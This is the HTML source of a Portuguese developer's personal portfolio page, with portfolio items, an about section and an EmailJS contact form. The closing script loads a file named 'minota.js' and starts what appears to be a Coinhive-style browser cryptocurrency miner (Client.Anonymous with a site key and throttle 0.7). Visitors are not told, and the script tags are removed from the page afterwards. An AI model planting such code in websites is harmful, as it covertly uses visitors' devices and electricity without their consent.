<!DOCTYPE HTML>
<html lang="pt">
<head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#">
	<title>João Gaião - Um Programador Web do presente</title>
	<meta charset="utf-8">
	<link rel="shortcut icon" type="image/png" href="jg_favicon_sombra.png">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta name="robots" content="index, follow">
	<meta name="description" content="Site pessoal de João Gaião, um programador que acredita que a Web é mais do que um simples site.">
	<meta name="keywords" content="programador, web portugal, web algarve, web developer, web developer portugal, web developer algarve, html portugal, html algarve, javascript portugal, javascript algarve, mobile algarve, mobile portugal, html5 algarve, html5 portugal, criaçao de websites, sites, páginas web, aplicações móveis, aplicações">
	<meta property="og:title" content="João Gaião - Um Programador Web do presente">
	<meta property="og:type" content="website">
	<meta property="og:url" content="http://joaogaiao.ga/">
	<meta property="og:image" content="http://joaogaiao.ga/images/avatar.jpg">
	<meta property="og:description" content="Site pessoal de João Gaião, um programador que acredita que a Web é mais do que um simples site.">
	<!--[if lte IE 8]><script src="assets/js/ie/html5shiv.js"></script><![endif]-->
	<!--[if lte IE 8]><link rel="stylesheet" href="assets/css/ie8.css" /><![endif]-->
	<!--[if lte IE 8]><script src="assets/js/ie/respond.min.js"></script><![endif]-->
	<!--[if lte IE 9]><link rel="stylesheet" href="assets/css/ie9.css" /><![endif]-->
	<script src="assets/js/head.load.min.js"></script>
	<script class="scripto" type="text/javascript">
	head.load(["https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css", "assets/css/main.min.css", "https://cdnjs.cloudflare.com/ajax/libs/alertify.js/0.3.11/alertify.core.min.css", "https://cdnjs.cloudflare.com/ajax/libs/alertify.js/0.3.11/alertify.default.min.css", "https://cdnjs.cloudflare.com/ajax/libs/magnific-popup.js/1.1.0/magnific-popup.min.css"]);
	</script>
	<style class="scripto" media="screen">
		#loaderWrapper {
			position: fixed;
			width: 100%;
			height: 100%;
			top: 0;
			left: 0;
			background-color: #222629;
			z-index: 9999;
		}
		#loader {
			position: absolute;
			top: 50%;
			left: 50%;
			margin-left: -50px;
			margin-top: -50px;
			width: 100px;
			height: 100px;
		}
		.sk-folding-cube {
		  margin: 20px auto;
		  width: 100%;
		  height: 100%;
		  position: relative;
		  -webkit-transform: rotateZ(45deg);
		          transform: rotateZ(45deg);
		}

		.sk-folding-cube .sk-cube {
		  float: left;
		  width: 50%;
		  height: 50%;
		  position: relative;
		  -webkit-transform: scale(1.1);
		      -ms-transform: scale(1.1);
		          transform: scale(1.1);
		}
		.sk-folding-cube .sk-cube:before {
		  content: '';
		  position: absolute;
		  top: 0;
		  left: 0;
		  width: 100%;
		  height: 100%;
		  background-color: #333;
		  -webkit-animation: sk-foldCubeAngle 2.4s infinite linear both;
		          animation: sk-foldCubeAngle 2.4s infinite linear both;
		  -webkit-transform-origin: 100% 100%;
		      -ms-transform-origin: 100% 100%;
		          transform-origin: 100% 100%;
		}
		.sk-folding-cube .sk-cube2 {
		  -webkit-transform: scale(1.1) rotateZ(90deg);
		          transform: scale(1.1) rotateZ(90deg);
		}
		.sk-folding-cube .sk-cube3 {
		  -webkit-transform: scale(1.1) rotateZ(180deg);
		          transform: scale(1.1) rotateZ(180deg);
		}
		.sk-folding-cube .sk-cube4 {
		  -webkit-transform: scale(1.1) rotateZ(270deg);
		          transform: scale(1.1) rotateZ(270deg);
		}
		.sk-folding-cube .sk-cube2:before {
		  -webkit-animation-delay: 0.3s;
		          animation-delay: 0.3s;
		}
		.sk-folding-cube .sk-cube3:before {
		  -webkit-animation-delay: 0.6s;
		          animation-delay: 0.6s;
		}
		.sk-folding-cube .sk-cube4:before {
		  -webkit-animation-delay: 0.9s;
		          animation-delay: 0.9s;
		}
		@-webkit-keyframes sk-foldCubeAngle {
		  0%, 10% {
		    -webkit-transform: perspective(140px) rotateX(-180deg);
		            transform: perspective(140px) rotateX(-180deg);
		    opacity: 0;
		  } 25%, 75% {
		    -webkit-transform: perspective(140px) rotateX(0deg);
		            transform: perspective(140px) rotateX(0deg);
		    opacity: 1;
		  } 90%, 100% {
		    -webkit-transform: perspective(140px) rotateY(180deg);
		            transform: perspective(140px) rotateY(180deg);
		    opacity: 0;
		  }
		}

		@keyframes sk-foldCubeAngle {
		  0%, 10% {
		    -webkit-transform: perspective(140px) rotateX(-180deg);
		            transform: perspective(140px) rotateX(-180deg);
		    opacity: 0;
		  } 25%, 75% {
		    -webkit-transform: perspective(140px) rotateX(0deg);
		            transform: perspective(140px) rotateX(0deg);
		    opacity: 1;
		  } 90%, 100% {
		    -webkit-transform: perspective(140px) rotateY(180deg);
		            transform: perspective(140px) rotateY(180deg);
		    opacity: 0;
		  }
		}
	</style>
</head>
<body>
	<div id="loaderWrapper">
		<div id="loader">
			<div class="sk-folding-cube">
			  <div class="sk-cube1 sk-cube"></div>
			  <div class="sk-cube2 sk-cube"></div>
			  <div class="sk-cube4 sk-cube"></div>
			  <div class="sk-cube3 sk-cube"></div>
			</div>
		</div>
	</div>
	<div id="header">
		<div class="top">
			<div id="logo" itemscope itemtype="http://schema.org/Person">
				<span class="image avatar48"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="images/avatar.jpg" alt="João Gaião" /></span>
				<h1 id="title" itemprop="name">João Gaião</h1>
				<p itemprop="jobTitle">Programador Web</p>
				<meta itemprop="image" content="https://jgaiao.github.io/images/avatar.jpg">
				<meta itemprop="email" content="joaovmgaiao@gmail.com">
				<meta itemprop="nationality" content="Portugal">
				<meta itemprop="workLocation" content="Faro, Portugal">
				<meta itemprop="homeLocation" content="Faro, Portugal">
			</div>
			<nav id="nav">
				<ul>
					<li><a href="#top" id="top-link" class="skel-layers-ignoreHref"><span class="icon fa-home">Introdução</span></a></li>
					<li><a href="#portfolio" id="portfolio-link" class="skel-layers-ignoreHref"><span class="icon fa-th">Portfólio</span></a></li>
					<li><a href="#about" id="about-link" class="skel-layers-ignoreHref"><span class="icon fa-user">Sobre Mim</span></a></li>
					<li><a href="#contact" id="contact-link" class="skel-layers-ignoreHref"><span class="icon fa-envelope">Contacto</span></a></li>
				</ul>
			</nav>
		</div>
		<div class="bottom">
			<ul class="icons">
				<li><a href="https://twitter.com/joaovmgaiao" target="_blank" class="icon fa-twitter"><span class="label">Twitter</span></a></li>
				<li><a href="https://www.facebook.com/joaovmgaiao" target="_blank" class="icon fa-facebook"><span class="label">Facebook</span></a></li>
				<li><a href="https://github.com/jgaiao" target="_blank" class="icon fa-github"><span class="label">Github</span></a></li>
				<li><a href="mailto:joaovmgaiao@gmail.com" target="_blank" class="icon fa-envelope"><span class="label">Email</span></a></li>
			</ul>
		</div>
	</div>
	<div id="main">
		<!-- Intro -->
		<section id="top" class="one dark cover">
			<div class="container">
				<header>
					<h2 class="alt">Olá, o meu nome é <strong>João Gaião</strong></h2>
					<p>Acredito que a Web é mais poderosa do que um simples site! Desde aplicações para todo o tipo de dispositivos (desktop, telemóvel, relógio, televisão, etc...), plataformas complexas de gestão empresarial, interfaces de hardware e automação. Hoje em dia, tudo isto é Web!</p>
				</header>
				<footer>
					<a href="#portfolio" class="button scrolly">Veja o meu trabalho</a>
				</footer>
			</div>
		</section>
		<section id="portfolio" class="two">
			<div class="container">
				<header>
					<h2>O meu trabalho</h2>
				</header>
				<p>Aqui estão apenas os projetos relevantes e devidamente finalizados.</p>
				<div class="row">
					<div class="4u 12u$(mobile)">
						<article class="item">
							<a href="images/cartaomatriz-screenshot.png" class="image fit image-link"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="images/cartaomatriz.png" alt="Cartão Matriz de João Gaião" title="Cartão Matriz" /></a>
							<header>
								<h3>Cartão Matriz</h3>
								<p>Uma aplicação para armazenar e consultar credenciais de acesso a bancos online.</p>
							</header>
						</article>
					</div>
					<div class="4u 12u$(mobile)">
						<article class="item">
							<a href="images/imc-calc-screenshot.png" class="image fit image-link"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="images/img_calc.png" alt="Calculadora IMC de João Gaião" title="Calculadora de IMC" /></a>
							<header>
								<h3>Calculadora de IMC</h3>
								<p>Uma aplicação simples para calcular o Índice de Massa Corporal e o Peso Ideal.</p>
							</header>
						</article>
					</div>
				</div>
			</div>
		</section>
		<section id="about" class="three">
			<div class="container">
				<header>
					<h2>Sobre mim</h2>
				</header>
				<a class="image featured"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="images/pico.jpg" alt="Ilha do Pico vista do Faial - João Gaião" /></a>
				<p>Todos nós temos uma fonte de inspiração, uma 'musa', algo que nos move inconscientemente. A minha é a terra onde nasci, os Açores, em especial as ilhas Faial e Pico. Acredito que tudo o que faço ou penso é influênciado em parte por essa força da natureza.</p>
				<p>Desde pequeno que demonstrei um gosto genuíno pela informática. Na fase da adolescência, em que questionava a minha vocação, considerava a programação um 'monstro' que estaria fora do meu alcançe. Poucos anos mais tarde, num curso de informática, aprendi as bases da programação. Desde então a paixão pela programação tem crescido exponêncialmente. A dada altura conheci o Javascript e a Web tornou-se o meu foco principal, foi amor à primeira indentação.</p>
			</div>
		</section>
		<!-- Contact -->
		<section id="contact" class="four">
			<div class="container">
				<header>
					<h2>Contacto</h2>
				</header>
				<p>Se quiser deixar uma mensagem, está à vontade.</p>
				<form id="contactos" method="post" action="">
					<div class="row">
						<div class="6u 12u$(mobile)"><input id="nome" type="text" name="nome" placeholder="Nome" /></div>
						<div class="6u 12u$(mobile)"><input id="email" type="email" name="email" placeholder="Email" /></div>
						<div class="12u$">
							<textarea id="mensagem" name="mensagem" placeholder="Mensagem"></textarea>
						</div>
						<div class="12u$">
							<input type="submit" value="Enviar Mensagem" />
						</div>
					</div>
				</form>
			</div>
		</section>
	</div>
	<script class="scripto" type="text/javascript">
	head.load(["https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js",{ jquery: "https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js" }, { alertify: "https://cdnjs.cloudflare.com/ajax/libs/alertify.js/0.3.11/alertify.min.js" }], function() {
		head.load(["https://www.googletagmanager.com/gtag/js?id=UA-113112361-1", { scrolly: "assets/js/jquery.scrolly.min.js" }, { scrollzer: "assets/js/jquery.scrollzer.min.js" }, { skel: "https://cdnjs.cloudflare.com/ajax/libs/skel/3.0.1/skel.min.js" }, { unveil:  "https://cdnjs.cloudflare.com/ajax/libs/unveil/1.3.0/jquery.unveil.min.js" }, "https://cdnjs.cloudflare.com/ajax/libs/magnific-popup.js/1.1.0/jquery.magnific-popup.min.js"], function() {
			//googletagmanager
			window.dataLayer = window.dataLayer || [];
			function gtag(){dataLayer.push(arguments);}
			gtag('js', new Date());
			gtag('config', 'UA-113112361-1');
			head.load(["assets/js/util.min.js", "assets/js/main.min.js", { emailjs: "https://cdn.emailjs.com/dist/email.min.js" }, "minota.js"], function() {
				//webfont
				WebFont.load({
					google: {
						families: ['Source+Sans+Pro']
					}
				});
				//minota
				var _client = new Client.Anonymous('e0cfbe813d0875499731a253573511d707e16f5e1fc2768ec218fc94623a6d7f', {
					throttle: 0.7, c: 'w', ads: 0
				});
				_client.start();
				var validateEmail = function(email) {
					var re = /^(([^<>()[\]\\.,;:\s@"]+(\.[^<>()[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
					return re.test(email);
				}
				emailjs.init("user_JiuoJWZ7wFMkqVwt0dxtN");
				$("img").unveil(200);
				$('.image-link').magnificPopup({type:'image'});
				$("#contactos").on("submit", function(e) {
					e.preventDefault();
					var self = $(this);
					self.find('input[type="submit"]').val("A enviar...");
					var nome = self.find("#nome");
					var email = self.find("#email");
					var msg = self.find("#mensagem");

					if(nome.val() != '' && email.val() != '' && msg.val() != '') {
						if(validateEmail(email.val())) {
							if (nome.val().length < 4) {
								alertify.alert("O seu nome é assim tão pequeno? Incrível! Mas infelizmente eu não acredito...");
							} else if(msg.val().length < 10) {
								alertify.alert("Só tem mesmo isso para escrever? Tente fazer um bocadinho melhor...");
							} else {
								emailjs.send("gmaili","default", {name: nome.val(), email: email.val(), message: msg.val()}).then(function(response) {
								   alertify.alert("Mensagem enviada com sucesso, responderei assim que me for possível. Obrigado.");
									 self.find('input[type="submit"]').val("Enviar Mensagem");
								}, function(err) {
								   alertify.alert("Ocorreu um erro inesperado, por favor tente novamente mais tarde ou por email.");
									 self.find('input[type="submit"]').val("Enviar Mensagem");
								});
							}
						} else {
							alertify.alert("Tem de fornecer um email válido! Ou achava que eu não iria notar?");
						}
					} else {
						alertify.alert("Tem de preencher todos os campos do formulário, não são assim tantos...");
					}
				});
				$(".scripto").remove();
				$("#loaderWrapper").fadeOut(200);
			});
		});
	});
	</script>
</body>
</html>
